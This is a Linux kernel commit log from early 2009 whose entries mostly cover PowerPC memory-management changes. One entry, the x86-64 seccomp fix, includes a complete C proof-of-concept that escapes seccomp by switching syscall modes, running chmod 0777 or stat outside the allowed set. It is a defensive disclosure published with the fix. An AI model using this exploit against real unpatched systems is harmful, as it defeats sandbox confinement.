1. 11 Mar, 2009 6 commits
  2. 09 Mar, 2009 1 commit
  3. 03 Mar, 2009 1 commit
    • R
      x86-64: seccomp: fix 32/64 syscall hole · 5b101740
      Roland McGrath committed
      On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
      ljmp, and then use the "syscall" instruction to make a 64-bit system
      call.  A 64-bit process can make a 32-bit system call with int $0x80.
      
      In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
      the wrong system call number table.  The fix is simple: test TS_COMPAT
      instead of TIF_IA32.  Here is an example exploit:
      
      	/* test case for seccomp circumvention on x86-64
      
      	   There are two failure modes: compile with -m64 or compile with -m32.
      
      	   The -m64 case is the worst one, because it does "chmod 777 ." (could
      	   be any chmod call).  The -m32 case demonstrates it was able to do
      	   stat(), which can glean information but not harm anything directly.
      
      	   A buggy kernel will let the test do something, print, and exit 1; a
      	   fixed kernel will make it exit with SIGKILL before it does anything.
      	*/
      
      	#define _GNU_SOURCE
      	#include <assert.h>
      	#include <inttypes.h>
      	#include <stdio.h>
      	#include <linux/prctl.h>
      	#include <sys/prctl.h>	/* declares prctl() */
      	#include <sys/stat.h>
      	#include <unistd.h>
      	#include <asm/unistd.h>
      
      	int
      	main (int argc, char **argv)
      	{
      	  char buf[100];
      	  static const char dot[] = ".";
      	  long ret;
      	  unsigned st[24];
      
      	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
      	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
      
      	#ifdef __x86_64__
      	  assert ((uintptr_t) dot < (1UL << 32));
      	  asm ("int $0x80 # %0 <- %1(%2 %3)"
      	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
      	  ret = snprintf (buf, sizeof buf,
      			  "result %ld (check mode on .!)\n", ret);
      	#elif defined __i386__
      	  asm (".code32\n"
      	       "pushl %%cs\n"
      	       "pushl $2f\n"
      	       "ljmpl $0x33, $1f\n"
      	       ".code64\n"
      	       "1: syscall # %0 <- %1(%2 %3)\n"
      	       "lretl\n"
      	       ".code32\n"
      	       "2:"
      	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
      	  if (ret == 0)
      	    ret = snprintf (buf, sizeof buf,
      			    "stat . -> st_uid=%u\n", st[7]);
      	  else
      	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
      	#else
      	# error "not this one"
      	#endif
      
      	  write (1, buf, ret);
      
      	  syscall (__NR_exit, 1);
      	  return 2;
      	}
      Signed-off-by: Roland McGrath <roland@redhat.com>
      [ I don't know if anybody actually uses seccomp, but it's enabled in
        at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
      Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
  4. 23 Feb, 2009 9 commits
  5. 15 Feb, 2009 1 commit
    • Y
      powerpc/44x: Support for 256KB PAGE_SIZE · e1240122
      Yuri Tikhonov committed
      This patch adds support for 256KB pages on ppc44x-based boards.
      
      For simplification of implementation with 256KB pages we still assume
      2-level paging. As a side effect this leads to wasting extra memory space
      reserved for PTE tables: only 1/4 of pages allocated for PTEs are
      actually used. But this may be an acceptable trade-off to achieve the
      high performance we have with big PAGE_SIZEs in some applications (e.g.
      RAID).
      
      Also with 256KB PAGE_SIZE we increase THREAD_SIZE up to 32KB to minimize
      the risk of stack overflows in the cases of on-stack arrays whose size
      depends on the page size (e.g. multipage BIOs, NTFS, etc.).
      
      With 256KB PAGE_SIZE we need to decrease the PKMAP_ORDER at least down
      to 9; otherwise all high memory (2 ^ 10 * PAGE_SIZE == 256MB) will be
      occupied by PKMAP addresses, leaving no room for vmalloc. We do not
      separate PKMAP_ORDER for 256K from 16K/64K PAGE_SIZE here; actually that
      value of 10 in support for 16K/64K had been selected rather intuitively.
      Thus now for all cases of PAGE_SIZE on ppc44x (including the default 4KB
      one) we have 512 pages for PKMAP.
      
      Because the ELF standard supports page sizes only up to 64K, you should
      use binutils later than 2.17.50.0.3 with '-zmax-page-size' set to 256K
      when building applications that are to run on a kernel with 256KB
      pages. If you use older binutils, patch them as follows:
      
      	--- binutils/bfd/elf32-ppc.c.orig
      	+++ binutils/bfd/elf32-ppc.c
      
      	-#define ELF_MAXPAGESIZE                0x10000
      	+#define ELF_MAXPAGESIZE                0x40000
      
      One more restriction we currently have with 256KB page sizes is the inability
      to use shmem safely, so, for now, the 256KB option is available only if you turn
      the CONFIG_SHMEM option off (another variant is to use BROKEN).
      If you do need shmem with 256KB pages, you can always remove the !SHMEM
      dependency in 'config PPC_256K_PAGES', and use the workaround available here:
       http://lkml.org/lkml/2008/12/19/20
      
      Signed-off-by: Yuri Tikhonov <yur@emcraft.com>
      Signed-off-by: Ilya Yanok <yanok@emcraft.com>
      Signed-off-by: Josh Boyer <jwboyer@linux.vnet.ibm.com>
  6. 13 Feb, 2009 3 commits
  7. 11 Feb, 2009 2 commits
    • B
      powerpc/mm: Rework I$/D$ coherency (v3) · 8d30c14c
      Benjamin Herrenschmidt committed
      This patch reworks the way we do I and D cache coherency on PowerPC.
      
      The "old" way was split in 3 different parts depending on the processor type:
      
         - Hash with per-page exec support (64-bit and >= POWER4 only) does it
      at hashing time, by preventing exec on unclean pages and cleaning pages
      on exec faults.
      
         - Everything without per-page exec support (32-bit hash, 8xx, and
      64-bit < POWER4) does it for all pages going to user space in update_mmu_cache().
      
         - Embedded with per-page exec support does it from do_page_fault() on
      exec faults, in a way similar to what the hash code does.
      
      That leads to confusion, and bugs. For example, the method using update_mmu_cache()
      is racy on SMP, where another processor can see the new PTE and hash it in before
      we have cleaned the cache, and then blow up trying to execute. This is hard to hit but
      I think it has bitten us in the past.
      
      Also, it's inefficient for embedded where we always end up having to do at least
      one more page fault.
      
      This reworks the whole thing by moving the cache sync into two main call sites,
      though we keep different behaviours depending on the HW capability. The call
      sites are set_pte_at() which is now made out of line, and ptep_set_access_flags()
      which joins the former in pgtable.c.
      
      The base idea for Embedded with per-page exec support, is that we now do the
      flush at set_pte_at() time when coming from an exec fault, which allows us
      to avoid the double fault problem completely (we can even improve the situation
      more by implementing TLB preload in update_mmu_cache() but that's for later).
      
      If for some reason we didn't do it there and we try to execute, we'll hit
      the page fault, which will do a minor fault, which will hit ptep_set_access_flags()
      to do things like update _PAGE_ACCESSED or _PAGE_DIRTY if needed. We now make
      that function also perform the I/D cache sync for exec faults. This second path
      is the catch-all for things that weren't cleaned at set_pte_at() time.
      
      For CPUs without per-page exec support, we always do the sync at set_pte_at(),
      thus guaranteeing that when the PTE is visible to other processors, the cache
      is clean.
      
      For the 64-bit hash with per-page exec support case, we keep the old mechanism
      for now. I'll look into changing it later, once I've reworked a bit how we
      use _PAGE_EXEC.
      
      This is also a first step for adding _PAGE_EXEC support for embedded platforms.
      
      Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
  8. 29 Jan, 2009 1 commit
    • K
      powerpc/fsl-booke: Cleanup init/exception setup to be runtime · 105c31df
      Kumar Gala committed
      We currently have a few variants of fsl-booke processors (e500v1, e500v2,
      e500mc, and e200).  They all have minor differences that we had previously
      been handling via ifdefs.
      
      To move towards handling these differences at runtime, the following changes have been made:
      
      * PID1, PID2 only exist on e500v1 & e500v2 and should not be accessed on
        e500mc or e200.  We use MMUCFG[NPIDS] to determine which case we are
        in, since we only touch PID1/2 in extremely early init code.
      
      * Not all IVORs exist on all the processors, so introduce cpu_setup
        functions for each variant to set up the proper IVORs that are either
        unique or exist but have some variations between the processors.
      
      Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
  9. 16 Jan, 2009 1 commit
  10. 15 Jan, 2009 1 commit
  11. 14 Jan, 2009 1 commit
  12. 13 Jan, 2009 1 commit
  13. 08 Jan, 2009 6 commits
  14. 07 Jan, 2009 4 commits
  15. 01 Jan, 2009 1 commit
  16. 31 Dec, 2008 1 commit